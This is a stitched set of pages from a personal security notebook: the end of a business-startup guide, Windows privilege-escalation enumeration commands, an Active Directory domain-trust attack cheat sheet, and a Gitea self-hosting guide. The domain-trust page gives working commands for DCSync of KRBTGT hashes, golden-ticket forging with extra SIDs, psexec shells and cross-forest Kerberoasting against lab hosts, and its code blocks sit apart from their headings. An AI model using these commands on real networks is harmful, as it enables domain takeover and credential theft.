happen, and when it must happen, in order for you to open as planned. In some cases, the implementation schedule can also be part of or an addendum to the business plan. Some people like to work with several lists, one for marketing and promotion, one for staffing, one for setting up the physical space, and so on. This can be a good way to organize detailed steps, but a master Milestone list of the major events and activities is also important. It consolidates key required actions and their sequence on a single spreadsheet or two. Purchasing some project management software to help do all this could be a smart move. See the suggestions listed at the end of this Step. For a retail operation, the implementation schedule might include actions such as: * choosing a location * negotiating the lease * organizing space * selecting and ordering a computer system * selecting vendors * ordering initial inventory * designing a logo and marketing materials * developing the website * ordering and installing signs * hiring and training employees * ticketing and setting out merchandise Then several actions may be sub-divided. For example, under organize space, you might list the following: * hook up utilities * design and renovate space * install telecommunications and computers * install security system * purchase fixtures, displays and furniture * organize inventory area Adapt this list appropriately if you’re not in retail. Be as thorough as possible in creating this list, documenting every activity you must complete before you are ready to open the doors. If possible, review it with someone who has experience in the same kind of business. You’ll now want to put together your implementation plan. **Questions to ask:** * Have I defined implementation steps for each key piece of my business plan? * Have I set target dates for each major action and sub-action? * Do the different elements of my implementation plan dovetail appropriately? Have I established a sequence of events that’s effective and efficient? * If I am leasing space, when should I take possession? How can I put off paying rent on the space until late in game, and still be ready to open on time? * How many action steps can I manage concurrently? * Have I identified people who can review my implementation schedule and comment on it? [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#commit-your-resources) Commit Your Resources -------------------------------------------------------------------------------------------------------------------------------------------------------------- **Goal:** You’re working away on your implementation plan. Having arrived at this juncture, with your business plan and implementation schedule in hand, it is time to take a deep breath and ask yourself if you still want to start this business. If your answer is yes, the time has come to begin making your implementation schedule a daily reality, and to begin committing your financial, physical, and personal resources to the tasks ahead. Before you invest in equipment or make commitments to employees, you must act on the research you did in **Step 4** and line up the financing necessary to start your business. Secure the loan, credit line or investment you have selected and, with the money in hand, you can begin to make every dollar count. This is when you negotiate your final lease agreement, begin to renovate your space, and arrange for the inventory and equipment you need to operate your business. Even with a home-based business, you may need to acquire office equipment, software, a telephone system, supplies, and possibly support services. This is also the time to establish all of the systems for your business — accounting, sales, inventory, personnel, legal, customer relations, etc. If you need to hire people, you’ll need some understanding of employment laws. In larger start-ups, assembling a management team comes into play, although initial selection would have been done early on (and included in the business plan, **Step 9**). Selecting the right people — from the person who greets the customers to your vice president of marketing — requires their commitment to your business vision. In addition to selecting personnel, you must take some time to educate them about the business, how you want it run, and establish mutual expectations. **Questions to ask:** * Do I want to commit my resources to this business? * Have I secured the financial capital I need to take care of expenses up to the opening day? * Do I have the financial resources to fund the first year or two of operation, given a worst case scenario? Do I know where to turn for these resources? * Have I identified and secured appropriate space? * Have I selected the necessary equipment, supplies and services? * Am I using the advice, support and connections of my board of advisors as well as the business community at large to make sure that I am making good decisions? * Have I considered my exit strategy for what I will eventually do with the business? Sell it? Close it? Leave it to my children? Take it public? [](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#launch-your-business) Launch Your Business ------------------------------------------------------------------------------------------------------------------------------------------------------------ **Goal:** You are the proud owner of your own business and have hung up the sign, _Open for Business_. Now that you have committed resources, you have to realize that each day that goes by without revenue coming in is actually costing you money. Whether it is inventory sitting on a shelf, lease payments on yet-to-be-used space, or interest on a $3 million loan, you are incurring expenses against nonexistent revenue. This is where a carefully constructed implementation plan pays off. You drafted that plan to minimize costly downtime. Now you need to implement it as efficiently as possible to start generating revenue. Even with the best business and implementation plans, things sometimes go awry. Lease arrangements fall through. Your telecommunications system is inoperable. The wrong inventory assortment arrives. But when you have a thorough plan, such events cause plan revisions, not total disasters. Somewhere down at the bottom of your implementation plan is the line: OPENING DAY. While the day is different in different businesses, it is always a major landmark and requires its own special preparation. You probably have many people you would like to share this day with, but the most important people are your customers. Opening day is almost always an excellent opportunity for special advertising, promotion and public relations. While retail businesses are well known for opening day flags, banners and specials, any business should launch its promotional and sales effort as rapidly as possible — usually well before opening. If you have prepared carefully, you’ll be ready to go. It is unlikely that everything will go according to your plan, but the initial plan provides a starting point. Then it’s up to you. Congratulations to you, and best of luck in your new venture! **Questions to ask:** * Can I accelerate certain steps on my implementation plan? Can I run things concurrently? * Now that I’m into it, does the plan need revision? What contingencies are affected? * Which parts of the plan offer promotional or public relations opportunities? Can I generate free publicity before opening day? * Should I have a PR firm or ad agency help me with my pre-launch, launch, and post-launch activities? * Is a website important? Are signs important? * Is my opening day an opportunity for free publicity that will reach potential customers? Even if they do not see it, can I use it to mail or e-mail to them? * How soon after the launch will I have customers? How will I measure this? [PreviousConsulting](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting) [NextOpen Source Business & SaaS Tools](https://martian1337.gitbook.io/notes/cyber-entreprenuership/open-source-business-and-saas-tools) Last updated 1 year ago * [Explore Your Motivations and Skills](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#explore-your-motivations-and-skills) * [Define and Test Your Business Idea](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#define-and-test-your-business-idea) * [Create Your Board of Advisors](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#create-your-board-of-advisors) * [Investigate Financing](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#investigate-financing) * [Choose Your Market Niche](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#choose-your-market-niche) * [Select Your Site/Location](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#select-your-site-location) * [Analyze the Competition](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#analyze-the-competition) * [Determine the Legal Structure of the Business](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#determine-the-legal-structure-of-the-business) * [Prepare a Detailed Implementation Schedule](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#prepare-a-detailed-implementation-schedule) * [Commit Your Resources](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#commit-your-resources) * [Launch Your Business](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business#launch-your-business) --- # Manual Enumeration | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/manual-enumeration.md) . [](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/manual-enumeration#situational-awareness) Situational Awareness --------------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/manual-enumeration#network-information) Network Information Copy # IP Settings ipconfig /all # ARP Table arp -a # Routing Table route print ### [](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/manual-enumeration#windows-defender-status) Windows Defender Status Copy Get-MpComputerStatus | select AntivirusEnabled, ### [](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/manual-enumeration#applocker-enabled) AppLocker Enabled Copy Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections [](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/manual-enumeration#initial-enumeration) Initial Enumeration ----------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/manual-enumeration#system-information-commands) System Information Commands [PreviousWindows Group Privileges](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/windows-group-privileges) [NextCredential Theft](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/credential-theft) Last updated 1 year ago * [Situational Awareness](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/manual-enumeration#situational-awareness) * [Network Information](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/manual-enumeration#network-information) * [Windows Defender Status](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/manual-enumeration#windows-defender-status) * [AppLocker Enabled](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/manual-enumeration#applocker-enabled) * [Initial Enumeration](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/manual-enumeration#initial-enumeration) * [System Information Commands](https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/manual-enumeration#system-information-commands) Copy # Running Processes tasklist /svc # Displaying Environment Variables set # Detailed System Information systeminfo # Display Hotfixes Get-HotFix | ft -AutoSize # Installed Programs Get-WmiObject -Class Win32_Product | select Name, Version # List Logged in Users query user # Current User Privileges whoami /priv # Get All Users net user # Detailed Group Information net localgroup administrators # Get Password Policy net accounts # Network Services netstat -ano # List Named Pipes gci \\.\pipe\ # Review Named Pipes accesschk.exe /accepteula \\.\Pipe\lsass -v --- # Domain Trust Enumeration | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration.md) . [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#enumerate-domain-trusts-powerview) Enumerate Domain Trusts (PowerView) ------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#show-existing-trusts) Show Existing Trusts Copy Get-Domaintrust ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#show-trust-mapping) Show Trust Mapping Copy Get-DomainTrustMapping ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#show-users-in-the-child-domain) Show Users in the Child Domain Copy Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#attacking-domain-trusts-child-greater-than-parent-windows) Attacking Domain Trusts - Child -> Parent (Windows) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- To perform this attack after compromising a child domain, we need the following: 1. The KRBTGT hash for the child domain 2. The SID for the child domain 3. The name of a target user in the child domain (does not need to exist!) 4. The FQDN of the child domain. 5. The SID of the Enterprise Admins group of the root domain. 6. With this data collected, the attack can be performed with Mimikatz. ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-1-obtaining-krbtgt-nt-hash) 1 Obtaining KRBTGT NT Hash ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-2-obtaining-sid-child-domain) 2 Obtaining SID Child Domain ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-3-name-target-user) 3 Name Target User ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-4-fqdn-child-domain) 4 FQDN Child Domain ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-5-sid-enterprise-admins-group) 5 SID Enterprise Admins Group ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-6-putting-it-all-together) 6 Putting It All Together ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-7-confirm-ticket) 7 Confirm Ticket ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-8-dcsync) 8 DCsync [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#attacking-domain-trusts-child-greater-than-parent-linux) Attacking Domain Trusts - Child -> Parent (Linux) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- We can also perform the attack shown in the previous section from a Linux attack host. To do so, we'll still need to gather the same bits of information: 1. The KRBTGT hash for the child domain 2. The SID for the child domain 3. The name of a target user in the child domain (does not need to exist!) 4. The FQDN of the child domain 5. The SID of the Enterprise Admins group of the root domain #### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-1-get-krbtgt-nt-hash) 1 Get KRBTGT NT Hash #### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-2-get-sid-child-domain) 2 Get SID Child Domain #### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-3-name-target-user-1) 3 Name Target User #### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-4-get-sid-enterprise-admins) 4 Get SID Enterprise Admins #### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-5-putting-it-all-together) 5 Putting it all Together #### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-6-export-ccache) 6 Export ccache #### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-7-get-shell) 7 Get Shell ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#automatic-way) Automatic Way [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#attacking-domain-trust-cross-forest-windows) Attacking Domain Trust - Cross-Forest (Windows) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#cross-forest-kerberoasting) Cross-Forest Kerberoasting ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#admin-password-reuse-and-group-membership) Admin Password Reuse & Group Membership ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#sid-history-abuse) SID History Abuse !\[\[Pasted image 20230428181936.png\]\] [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#attacking-domain-trusts-cross-forest-trust-abuse-linux) Attacking Domain Trusts - Cross-Forest Trust Abuse (Linux) --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#cross-forest-kerberosting) Cross-Forest Kerberosting [PreviousNetwork Security](https://martian1337.gitbook.io/notes/notes/network-security) [NextBleeding Edge Vulnerabilities](https://martian1337.gitbook.io/notes/notes/network-security/bleeding-edge-vulnerabilities) Last updated 1 year ago * [Enumerate Domain Trusts (PowerView)](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#enumerate-domain-trusts-powerview) * [Show Existing Trusts](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#show-existing-trusts) * [Show Trust Mapping](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#show-trust-mapping) * [Show Users in the Child Domain](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#show-users-in-the-child-domain) * [Attacking Domain Trusts - Child -> Parent (Windows)](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#attacking-domain-trusts-child-greater-than-parent-windows) * [1 Obtaining KRBTGT NT Hash](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-1-obtaining-krbtgt-nt-hash) * [2 Obtaining SID Child Domain](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-2-obtaining-sid-child-domain) * [3 Name Target User](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-3-name-target-user) * [4 FQDN Child Domain](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-4-fqdn-child-domain) * [5 SID Enterprise Admins Group](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-5-sid-enterprise-admins-group) * [6 Putting It All Together](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-6-putting-it-all-together) * [7 Confirm Ticket](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-7-confirm-ticket) * [8 DCsync](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#id-8-dcsync) * [Attacking Domain Trusts - Child -> Parent (Linux)](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#attacking-domain-trusts-child-greater-than-parent-linux) * [Automatic Way](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#automatic-way) * [Attacking Domain Trust - Cross-Forest (Windows)](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#attacking-domain-trust-cross-forest-windows) * [Cross-Forest Kerberoasting](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#cross-forest-kerberoasting) * [Admin Password Reuse & Group Membership](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#admin-password-reuse-and-group-membership) * [SID History Abuse](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#sid-history-abuse) * [Attacking Domain Trusts - Cross-Forest Trust Abuse (Linux)](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#attacking-domain-trusts-cross-forest-trust-abuse-linux) * [Cross-Forest Kerberosting](https://martian1337.gitbook.io/notes/notes/network-security/domain-trust-enumeration#cross-forest-kerberosting) Copy mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt Copy Get-DomainSID Copy # Can be a fake usernamr Copy Get-Domaintrust Copy Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid Copy # Mimikatz Way kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt # Rubeus Way \Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt Copy # List Tickets klist Copy # Mimikatz lsadump::dcsync Copy secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt Copy lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID" Copy Can be any name Copy lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins" Copy ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker Copy export KRB5CCNAME=hacker.ccache Copy psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5 Copy raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm Copy # Enumerate Cross Forest Users with SPN Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName # Rubeus /Domain flag .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap Copy # Check Foreign Groups Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL # Convert SID Convert-SidToName # Login, if we are part of the administrators group Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator Copy # Using -target-domain GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley --- # Forensics | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics.md) . [Volatility](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics/volatility) [PreviousDashboards](https://martian1337.gitbook.io/notes/notes/defensive-security/splunk/dashboards) [NextVolatility](https://martian1337.gitbook.io/notes/notes/defensive-security/forensics/volatility) Last updated 1 year ago --- # Hosting Gitea & Forgejo with Docker, Nginx, and Cloudflare Proxy | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy.md) . **Replace all example domains like** `**git.yourdomain.com**` **with your real domain or subdomain.** * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-1-project-directory-and-file-structure) Step 1: Project Directory and File Structure Connect to your VPS via SSH and create a main project directory: Copy ssh your_user@your_vps_ip mkdir -p ~/git-server/{gitea-data,forgejo-data,certs} cd ~/git-server Structure explanation: * `gitea-data/` or `forgejo-data/`: persistent volumes where application and database data are stored, surviving container restarts. * `certs/`: stores SSL certificates from Certbot. * The main directory holds your Docker Compose and Nginx config files. This clear separation helps with backups and easy upgrades. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-2-docker-compose-files-separate-for-each-serv) Step 2: Docker Compose Files (Separate for Each Service) ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#gitea-docker-compose-docker-compose-gitea.yml) Gitea Docker Compose (`docker-compose-gitea.yml`) Copy version: "3" services: gitea: image: gitea/gitea:latest container_name: gitea environment: - USER_UID=1000 - USER_GID=1000 - GITEA__server__DOMAIN=git.yourdomain.com - GITEA__server__ROOT_URL=https://git.yourdomain.com/ - GITEA__server__REVERSE_PROXY_TRUSTED_PROXIES=127.0.0.1 # Add Cloudflare IP ranges volumes: - ./gitea-data:/data networks: - git-net restart: always nginx: image: nginx:latest container_name: nginx-gitea ports: - "80:80" - "443:443" volumes: - ./nginx-gitea.conf:/etc/nginx/conf.d/default.conf:ro - ./certs:/etc/nginx/certs:ro depends_on: - gitea networks: - git-net restart: always networks: git-net: driver: bridge ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#forgejo-docker-compose-docker-compose-forgejo.yml) Forgejo Docker Compose (`docker-compose-forgejo.yml`) > **Note:** Add the latest Cloudflare IP ranges explicitly in `REVERSE_PROXY_TRUSTED_PROXIES` or `TRUSTED_PROXIES` environment variables to ensure accurate client IP logging and security. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-3-advanced-nginx-configuration) Step 3: Advanced Nginx Configuration Your Nginx config files must support important features: * **Proxy headers** to pass the correct client IP and protocol. * **WebSocket support** for real-time features. * **Static file caching** to improve performance. * **Client body size limit** to prevent abuse. * **Error and access logging** for troubleshooting. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#example-for-gitea-nginx-gitea.conf) Example for Gitea (`nginx-gitea.conf`): The Forgejo config is analogous but proxies to `http://forgejo:3000/`. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-4-cloudflare-ssl--firewall-integration) Step 4: Cloudflare SSL & Firewall Integration Use these Cloudflare settings to avoid common SSL errors: * **SSL/TLS mode:** set to **Full (strict)** to require your VPS to have a valid SSL cert. * Enable **Always Use HTTPS** to redirect all HTTP to HTTPS. * Upload your domain's SSL certificates with Certbot (next step) to avoid 525 SSL handshake errors. Configure your VPS firewall (UFW) to allow inbound HTTP/HTTPS only from Cloudflare's IPs: **Automation tip:** Write a script to periodically update UFW rules when Cloudflare IPs change. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-5-ssl-certificates-with-certbot--renewal-auto) Step 5: SSL Certificates with Certbot & Renewal Automation Install Certbot and get certificates for your domain: Certbot installs certificates in your local `certs/` folder (mounted to Nginx). Set up automatic renewal by editing the root crontab: Add the following line to renew certs daily and reload Nginx if renewed: Replace `docker-compose-gitea.yml` with your compose file if different. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-6-important-application-level-configuration-f) Step 6: Important Application-Level Configuration for Gitea & Forgejo ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#trusted-proxies) Trusted Proxies Add Cloudflare's IP ranges to trusted proxies so Gitea/Forgejo log true client IPs and prevent header spoofing. * Gitea uses `GITEA__server__REVERSE_PROXY_TRUSTED_PROXIES` * Forgejo uses `FORGEJO_APP__server__TRUSTED_PROXIES` You can list IPs or CIDR ranges separated by commas. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#custom-security-settings) Custom Security Settings Edit `app.ini` inside your persistent data volume or via UI after first run to: * Disable open user registrations * Configure SMTP settings for email notifications ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#persistent-databases) Persistent Databases Although SQLite (default) works for small setups, consider PostgreSQL or MySQL for durability: * See [Gitea Docker Database Docs](https://docs.gitea.com/installation/install-with-docker#databases) * For Forgejo, similar database integration is recommended - [https://forgejo.org/docs/latest/admin/config-cheat-sheet/](https://forgejo.org/docs/latest/admin/config-cheat-sheet/) * Store database files in volumes for persistence ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#volume-backup) Volume Backup Regularly back up your `gitea-data/` or `forgejo-data/` folders: Or use other backup strategies matching your needs. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-7-monitoring-and-log-management) Step 7: Monitoring and Log Management ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#logs) Logs Check logs to troubleshoot errors: * Nginx logs inside the container (mapped by default to `/var/log/nginx/`) * Docker container logs: ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#log-rotation) Log Rotation Logs can grow large. Implement log rotation on your VPS: * Use system tools like `logrotate` to compress and delete old logs. * Rotate Docker logs by configuring Docker daemon or mounting external log directories. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#automate-cloudflare-ip-updates) Automate Cloudflare IP Updates Cloudflare IPs can change. Automate firewall updates by scripting the download of IP lists and updating UFW rules on a schedule using cron. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-8-troubleshooting-common-issues) Step 8: Troubleshooting Common Issues * **Push failures** or 500 errors often indicate proxy or SSL misconfiguration. * Review Nginx error logs and container logs to pinpoint errors. * Confirm SSL cert validity and Nginx properly passes HTTP/HTTPS headers. * Check that trusted proxies in app settings include Cloudflare IPs, or client IPs will be unknown. * If WebSocket features fail, verify `proxy_set_header Upgrade` and connection headers are set. When in doubt, restart containers and services after config changes: Use logs to iteratively identify and fix errors. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-9-starting-your-deployment) Step 9: Starting Your Deployment From your project directory: * To start Gitea: * To start Forgejo: Visit [https://git.yourdomain.com/](https://git.yourdomain.com/) to complete initial web-based setup. Set up admin users, email notifications, and disable open registrations for security. ### [](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#summary) Summary Area Details & Best Practices Project Dir Structure Organize Docker, Nginx configs and persistent volume folders Docker Compose Separate files per service, map volumes, set trusted proxies Nginx Reverse Proxy Pass proxy headers, WebSocket support, static file caching, error logging Cloudflare Full (strict) SSL, Always HTTPS, IP whitelist Firewall + DNS proxying Firewall UFW allows only Cloudflare IPs on HTTP/HTTPS ports SSL Certs Install and auto-renew with Certbot App Config (Gitea/Forgejo) Trusted proxies, disable open registration, persistent DB Logs & Maintenance Monitor container and Nginx logs, rotate logs, automate IP updates Troubleshooting Use verbose logging, check proxy & SSL settings for errors [PreviousGit](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git) [NextTwo-VPS Private Proxy Architecture: Nginx Reverse Proxy Over Wireguard VPN](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/two-vps-private-proxy-architecture-nginx-reverse-proxy-over-wireguard-vpn) Last updated 8 months ago * [Step 1: Project Directory and File Structure](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-1-project-directory-and-file-structure) * [Step 2: Docker Compose Files (Separate for Each Service)](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#step-2-docker-compose-files-separate-for-each-serv) * [Gitea Docker Compose (docker-compose-gitea.yml)](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#gitea-docker-compose-docker-compose-gitea.yml) * [Forgejo Docker Compose (docker-compose-forgejo.yml)](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/git/hosting-gitea-and-forgejo-with-docker-nginx-and-cloudflare-proxy#forgejo-docker-compose-docker-compose-forgejo.yml) 